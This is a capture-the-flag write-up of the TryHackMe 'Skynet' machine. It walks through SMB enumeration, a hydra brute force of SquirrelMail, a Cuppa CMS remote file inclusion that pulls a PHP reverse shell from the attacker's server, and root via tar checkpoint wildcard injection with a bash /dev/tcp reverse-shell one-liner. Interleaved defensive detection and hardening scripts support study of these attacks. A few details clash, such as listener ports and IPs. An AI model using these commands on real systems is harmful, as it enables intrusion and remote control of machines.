CTF Writeups

Skynet Tryhackme room

A vulnerable Terminator themed Linux machine

WSGSec


What is Miles password for his emails?

  • We will start off with an nmap scan, as usual:
─$ nmap -A -p- $IP 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 14:12 EDT
Nmap scan report for 10.10.126.146
Host is up (0.017s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP SASL PIPELINING UIDL CAPA RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 IMAP4rev1 more have LITERAL+ ID IDLE ENABLE OK LOGIN-REFERRALS SASL-IR Pre-login listed post-login capabilities
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-10-10T13:12:56-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-10T18:12:56
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.40 seconds

Samba is running, as well as a web server on port 80. There is also a POP3 service (and IMAP) running.

I will now run a gobuster scan:

─$ gobuster dir -u http://10.10.126.146/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.126.146/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/10/10 14:16:00 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 314] [--> http://10.10.126.146/admin/]
/ai (Status: 301) [Size: 311] [--> http://10.10.126.146/ai/]
/config (Status: 301) [Size: 315] [--> http://10.10.126.146/config/]
/css (Status: 301) [Size: 312] [--> http://10.10.126.146/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.126.146/js/]
/server-status (Status: 403) [Size: 278]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.126.146/squirrelmail/]

===============================================================
2021/10/10 14:16:29 Finished
===============================================================
  • Multiple interesting directories found.
  • Most of them are forbidden when browsed, except for /squirrelmail. This must be where we need the email password for: SquirrelMail.

Time to enumerate SMB to see what we can find; enum4linux is one option among others:

└─$ enum4linux $IP          
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 10 14:22:49 2021
==========================
| Target Information |
==========================
Target ........... 10.10.126.146
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.126.146 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 10.10.126.146 |
=============================================
Looking up status of 10.10.126.146
SKYNET <00> - B <ACTIVE> Workstation Service
SKYNET <03> - B <ACTIVE> Messenger Service
SKYNET <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 10.10.126.146 |
======================================
[+] Server 10.10.126.146 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.126.146 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 10.10.126.146 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.126.146 from smbclient:
[+] Got OS info for 10.10.126.146 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 10.10.126.146 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==========================================
| Share Enumeration on 10.10.126.146 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
[+] Attempting to map shares on 10.10.126.146
//10.10.126.146/print$ Mapping: DENIED, Listing: N/A
//10.10.126.146/anonymous Mapping: OK, Listing: OK
//10.10.126.146/milesdyson Mapping: DENIED, Listing: N/A
//10.10.126.146/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 10.10.126.146 |
=====================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 16, in <module>
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
File "<frozen importlib._bootstrap>", line 982, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 925, in _find_spec
File "<frozen importlib._bootstrap_external>", line 1414, in find_spec
File "<frozen importlib._bootstrap_external>", line 1388, in _get_spec
File "<frozen importlib._bootstrap_external>", line 1369, in _legacy_get_spec
File "<frozen importlib._bootstrap>", line 423, in spec_from_loader
File "<frozen importlib._bootstrap_external>", line 716, in spec_from_file_location
File "<frozen zipimport>", line 191, in get_filename
File "<frozen zipimport>", line 713, in _get_module_code
File "<frozen zipimport>", line 647, in _compile_source
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.19-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 122
0x00000005L : 'rpc_s_access_denied',
^
SyntaxError: invalid syntax
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===============================
| Groups on 10.10.126.146 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 10.10.126.146 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\milesdyson (Local User)
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\********* (Local User)
==============================================
| Getting printer info for 10.10.126.146 |
==============================================
No printers returned.
enum4linux complete on Sun Oct 10 14:23:49 2021

Weak password policy: there is potential for a brute force if needed. We found a few usernames and shares, and enum4linux tells us that anonymous login to the shares may be possible. Let's try it:

─$ smbclient //10.10.126.146/anonymous -U anonymous                                       1 ⨯
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> help

We are now logged in to the anonymous share. We can grab the files on the share using the get command:

getting file \logs\log1.txt of size 471 as logs\log1.txt (10.0 KiloBytes/sec) (average 10.0 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0.0 KiloBytes/sec) (average 5.5 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0.0 KiloBytes/sec) (average 3.7 KiloBytes/sec)

When we cat the files on our own machine, there is a message for us as well as a wordlist in one of the log files:

─$ cat attention.txt 
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
$ cat logs\\log1.txt
**************
*************
**********
************
***********
**************
**************
************
*************
**************
***********


┌──(kali㉿kali)-[~/CTF/THM/skynet]
└─$ cat logs\\log2.txt

We can use the wordlist to brute force the SquirrelMail login form for the user found via Samba:

$ hydra -l milesdyson -P logs\\log1.txt 10.10.126.146 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-10 14:53:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.126.146:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.126.146 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra)

ans: *************
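A hydra run like the one above is loud in the web server's access log: dozens of POSTs to the same login handler from one client in a couple of seconds. The following is an added defender-side example, not part of the original writeup: the log lines are constructed (the path is the SquirrelMail handler hydra was pointed at, the client address is the one used in the writeup), and the detector buckets POSTs by client and minute and flags anything at or above a threshold.

```shell
#!/bin/sh
# Added example (not from the original writeup): spotting a login brute
# force in an Apache "combined" access log. Sample lines are constructed.

LOGIN_PATH='/squirrelmail/src/redirect.php'
THRESHOLD=10   # POSTs from one client to LOGIN_PATH within one minute

sample_login_log() {
  # Constructed: 12 POSTs in four seconds from 10.14.18.31 (the burst),
  # plus ordinary traffic from another client that must not be flagged.
  cat <<'EOF'
10.10.3.7 - - [10/Oct/2021:14:50:12 -0400] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
10.10.3.7 - - [10/Oct/2021:14:50:20 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.14.18.31 - - [10/Oct/2021:14:53:55 -0400] "GET /squirrelmail/src/login.php HTTP/1.0" 200 2301 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:56 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:56 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:56 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:57 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:57 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:57 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:57 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:58 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:58 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:58 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:59 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 2419 "-" "Mozilla/5.0 (Hydra)"
10.14.18.31 - - [10/Oct/2021:14:53:59 -0400] "POST /squirrelmail/src/redirect.php HTTP/1.0" 302 - "-" "Mozilla/5.0 (Hydra)"
EOF
}

find_login_bursts() {
  # Reads an access log on stdin. Counts POSTs to LOGIN_PATH per client IP
  # and per minute, and prints "ip minute count" for every bucket at or
  # above THRESHOLD. Status codes are deliberately not used, so the check
  # does not depend on how the application signals a failed login.
  awk -v path="$LOGIN_PATH" -v limit="$THRESHOLD" '
    $6 == "\"POST" && $7 == path {
      minute = substr($4, 2, 17)   # "[10/Oct/2021:14:53:56" -> "10/Oct/2021:14:53"
      n[$1 " " minute]++
    }
    END { for (k in n) if (n[k] >= limit) print k, n[k] }
  '
}

# Stand-alone run: sh detect.sh demo
if [ "${1:-}" = "demo" ]; then
  sample_login_log | find_login_bursts
fi
```

Run against the sample, the detector reports the single offending client and minute. Per-minute bucketing is coarse (a burst straddling a minute boundary is split in two), so in practice pair this with the mail server's own failed-authentication log, which records each bad login explicitly. The hydra user agent in the sample is a nice-to-have, not a signal to rely on, since it is trivially changed.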

What is the hidden directory?

  • Samba reset password found in a SquirrelMail email: [redacted]
  • Log in to the Samba share; there should be a note in the /notes folder:
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019
9204224 blocks of size 1024. 5818896 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \notes\>

Let’s cat the file:

$ cat important.txt                                                                    130 ⨯
/45kra24zxs28v3yd
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

We found a secret directory!! : /45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

  • Simply google this one to find the answer; a quick copy and paste of the question into Google will bring you close enough ;)
remote file inclusion

What is the user flag?

Time for more enumeration. Running another gobuster scan on the newly found directory reveals an admin panel for the CMS:

cuppacms

If we search ‘cuppacms’ on exploit-db, there are notes on an RFI exploit. We could use the RFI to cat the /etc/passwd file; instead, let's try a reverse shell:

─$ python3 -m http.server 8000                        
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.126.146 - - [10/Oct/2021 15:37:14] "GET /php-reverse-shell.php HTTP/1.0" 200 -
─$ curl http://10.10.126.146/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.18.31:8000/php-reverse-shell.php

Now open a netcat listener and we should receive a shell:

─$ nc -lvnp 9999   
listening on [any] 9999 ...
connect to [10.14.18.31] from (UNKNOWN) [10.10.126.146] 44042
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
14:37:15 up 1:30, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd home
$ ls
milesdyson
$ cd milesdyson
$ cat user.txt
*****************************

ans= **************
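Two things a defender would want after reading the RFI step above: a way to spot remote-URL values being fed into include-style parameters in the access log, and a check that the PHP setting which makes http:// includes possible at all (allow_url_include, Off by default) is not enabled. The following is an added example, not part of the original writeup: the log lines are constructed, the request path and urlConfig parameter are the ones the writeup used, and the php.ini used in the usage note is created on the fly.

```shell
#!/bin/sh
# Added example (not from the original writeup): detecting RFI probes in an
# Apache access log and checking the PHP setting that enables them.

sample_web_log() {
  # Constructed lines: one benign paginated request, the writeup's RFI
  # request, a URL-encoded variant of it, and an ordinary webmail request.
  cat <<'EOF'
10.10.3.7 - - [10/Oct/2021:15:30:02 -0400] "GET /45kra24zxs28v3yd/administrator/?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.14.18.31 - - [10/Oct/2021:15:37:14 -0400] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.18.31:8000/php-reverse-shell.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.14.18.31 - - [10/Oct/2021:15:38:41 -0400] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10.14.18.31%3A8000%2Fx.txt HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.3.7 - - [10/Oct/2021:15:40:00 -0400] "GET /squirrelmail/src/webmail.php?mailbox=INBOX HTTP/1.1" 200 800 "-" "Mozilla/5.0"
EOF
}

find_remote_include_attempts() {
  # Reads an access log on stdin and prints "ip path param value" for every
  # query parameter whose value is a URL or a PHP stream wrapper, which is
  # what an include()-style parameter should never legitimately receive.
  # Only %3A and %2F are decoded; a full decoder belongs in a real pipeline.
  awk '
    {
      req = $7
      q = index(req, "?")
      if (q == 0) next
      path = substr(req, 1, q - 1)
      n = split(substr(req, q + 1), kv, "&")
      for (i = 1; i <= n; i++) {
        eq = index(kv[i], "=")
        if (eq == 0) continue
        name = substr(kv[i], 1, eq - 1)
        dec = substr(kv[i], eq + 1)
        gsub(/%3[aA]/, ":", dec)
        gsub(/%2[fF]/, "/", dec)
        if (dec ~ "^(https?|ftp)://" || dec ~ "^(php|data|expect):")
          print $1, path, name, dec
      }
    }
  '
}

php_allows_remote_include() {
  # Returns 0 (true) if the php.ini given as $1 turns on allow_url_include.
  # include()/require() of http:// URLs only works when this is On; the
  # PHP default is Off, so finding it On is a misconfiguration to fix.
  grep -Ei '^[[:space:]]*allow_url_include[[:space:]]*=[[:space:]]*(on|1|true|yes)' "$1" >/dev/null
}

# Stand-alone run: sh rfi-check.sh demo [/path/to/php.ini]
if [ "${1:-}" = "demo" ]; then
  sample_web_log | find_remote_include_attempts
  if [ -n "${2:-}" ]; then
    if php_allows_remote_include "$2"; then echo "allow_url_include is On in $2"
    else echo "allow_url_include is Off in $2"; fi
  fi
fi
```

On the sample, only the two urlConfig requests are reported (the encoded one is printed decoded); the paginated request and the webmail request are not. For the configuration side, point the second argument at the server's php.ini: the application-level fix is to never pass user input to include(), and the platform-level backstop is allow_url_include = Off.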

What is the root flag?

Taking a peek at Dyson's backups folder shows a world-executable script owned by root, which is found running every minute:

www-data@skynet:/home/milesdyson/backups$ ls
backup.sh backup.tgz
www-data@skynet:/home/milesdyson/backups$ ls -l
total 4576
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4679680 Oct 10 14:45 backup.tgz
www-data@skynet:/home/milesdyson/backups$

We can check GTFOBins to see whether tar can be used to escalate. We can use it to spawn a reverse shell: if we get the backup script's tar to read --checkpoint=1 and --checkpoint-action=exec=/bin/sh, it should spawn a shell. Echo a reverse shell into the directory where the backup is happening and make it executable:

$ echo '#!/bin/bash\nbash -i >& /dev/tcp/10.11.34.30/8888 0>&1' > /var/www/html/revshell 
$ chmod +x revshell
$ touch /var/www/html/--checkpoint=1 #must specify absolute path
$ touch /var/www/html/--checkpoint-action=exec=bash\ shell #must specify absolute path
  • We can open up another netcat listener to catch the shell:
$ nc -lvnp 8888
listening on [any] 6666 ...
connect to [10.11.34.30] from (UNKNOWN) [10.10.76.43] 36512
bash: cannot set terminal process group (2212): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# cat /root/root.txt
cat /root/root.txt
*************************
root@skynet:/var/www/html#

We now have access to the root flag :]
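The root cause of that escalation is a privileged job expanding a wildcard in a directory other users can write to. The following is an added example, not part of the original writeup and not the room's backup.sh: it builds a constructed directory containing entries whose names look like tar options, shows the unsafe pattern beside the fixed one, and adds a small hygiene check a monitor can run over such a directory.

```shell
#!/bin/sh
# Added example (not from the original writeup): why "tar cf backup.tgz *"
# in a user-writable directory is dangerous when run by root, and the fix.
# The directory contents are constructed here.

make_fixture() {
  # One real file plus two entries whose *names* are spelled like tar
  # options. Anyone who can write to the directory can create such names.
  dir=$(mktemp -d)
  printf 'real data\n' > "$dir/data.txt"
  : > "$dir/--checkpoint=1"
  : > "$dir/--checkpoint-action=exec=touch ACTION_RAN"
  printf '%s\n' "$dir"
}

vulnerable_backup() {
  # The unsafe pattern: the shell expands '*' into the entry names, and
  # GNU tar parses names starting with '--' as options, so the exec=
  # action runs with tar's privileges (root, under cron). Demo only; the
  # action here just touches ACTION_RAN in the directory.
  (cd "$1" && tar cf "$1.tgz" *)
}

hardened_backup() {
  # '--' ends option parsing, so everything after it is a file name no
  # matter how it is spelled. Better still: back up from a staging
  # directory only root can write to, or feed an explicit list via -T.
  (cd "$1" && tar cf "$1.tgz" -- *)
}

count_option_like_names() {
  # Hygiene check for a directory a privileged job archives: entries whose
  # names begin with '-' have no business there and are worth an alert.
  n=0
  for f in "$1"/-*; do
    [ -e "$f" ] && n=$((n + 1))
  done
  echo "$n"
}

# Stand-alone run: sh tar-wildcard.sh demo
if [ "${1:-}" = "demo" ]; then
  d=$(make_fixture)
  hardened_backup "$d"
  if [ -e "$d/ACTION_RAN" ]; then echo "hardened: action ran"
  else echo "hardened: no side effect, $(tar tf "$d.tgz" | wc -l) members archived"; fi
  echo "suspicious names in $d: $(count_option_like_names "$d")"
fi
```

With the `--` in place the two option-shaped entries are archived as ordinary members and nothing is executed, while the count function reports both of them so the condition can be alerted on before a privileged job ever runs there.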
